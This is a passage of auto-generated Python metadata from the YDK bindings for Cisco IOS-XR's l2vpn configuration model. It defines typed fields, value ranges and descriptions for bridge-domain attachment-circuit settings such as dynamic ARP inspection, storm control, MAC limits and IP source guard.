_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2 Interface Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai-address-validation', REFERENCE_CLASS, 'InterfaceDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
[], [],
''' Address Validation
''',
'interface_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
False,
[
_MetaInfoClassMember('bdac-storm-control-type', REFERENCE_LIST, 'BdacStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
[], [],
''' Storm Control Type
''',
'bdac_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon-group-id',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
False,
[
_MetaInfoClassMember('split-horizon-group-id', REFERENCE_CLASS, 'SplitHorizonGroupId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
[], [],
''' Split Horizon Group ID
''',
'split_horizon_group_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
False,
[
_MetaInfoClassMember('static-mac-address', REFERENCE_LIST, 'StaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
False,
[
_MetaInfoClassMember('interface-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'interface_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'interface_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
False,
[
_MetaInfoClassMember('interface-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Interface MAC address limit enforcement
action
''',
'interface_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on an Interface
after which MAC limit action is taken
''',
'interface_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Interface
''',
'interface_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
False,
[
_MetaInfoClassMember('interface-mac-aging', REFERENCE_CLASS, 'InterfaceMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'interface_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'interface_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit', REFERENCE_CLASS, 'InterfaceMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'interface_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'interface_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-secure', REFERENCE_CLASS, 'InterfaceMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
[], [],
''' MAC Secure
''',
'interface_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bdac-storm-control-types', REFERENCE_CLASS, 'BdacStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
[], [],
''' Storm Control
''',
'bdac_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai', REFERENCE_CLASS, 'InterfaceDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
[], [],
''' L2 Interface Dynamic ARP Inspection
''',
'interface_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Flooding
''',
'interface_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Unknown Unicast
Flooding
''',
'interface_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'interface_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-ip-source-guard', REFERENCE_CLASS, 'InterfaceIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
[], [],
''' IP Source Guard
''',
'interface_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac', REFERENCE_CLASS, 'InterfaceMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
[], [],
''' MAC configuration commands
''',
'interface_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'interface_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-profile', REFERENCE_CLASS, 'InterfaceProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
[], [],
''' Attach a DHCP profile
''',
'interface_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('split-horizon', REFERENCE_CLASS, 'SplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
[], [],
''' Split Horizon
''',
'split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-mac-addresses', REFERENCE_CLASS, 'StaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
False,
[
_MetaInfoClassMember('bd-attachment-circuit', REFERENCE_LIST, 'BdAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
[], [],
''' Name of the Attachment Circuit
''',
'bd_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
False,
[
_MetaInfoClassMember('bd-pseudowire-evpn', REFERENCE_LIST, 'BdPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
[], [],
''' EVPN Pseudowire configuration
''',
'bd_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
False,
[
_MetaInfoClassMember('dai-address-validation', REFERENCE_CLASS, 'DaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
[], [],
''' Address Validation
''',
'dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Dynamic ARP Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Routed Interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'routed-interface',
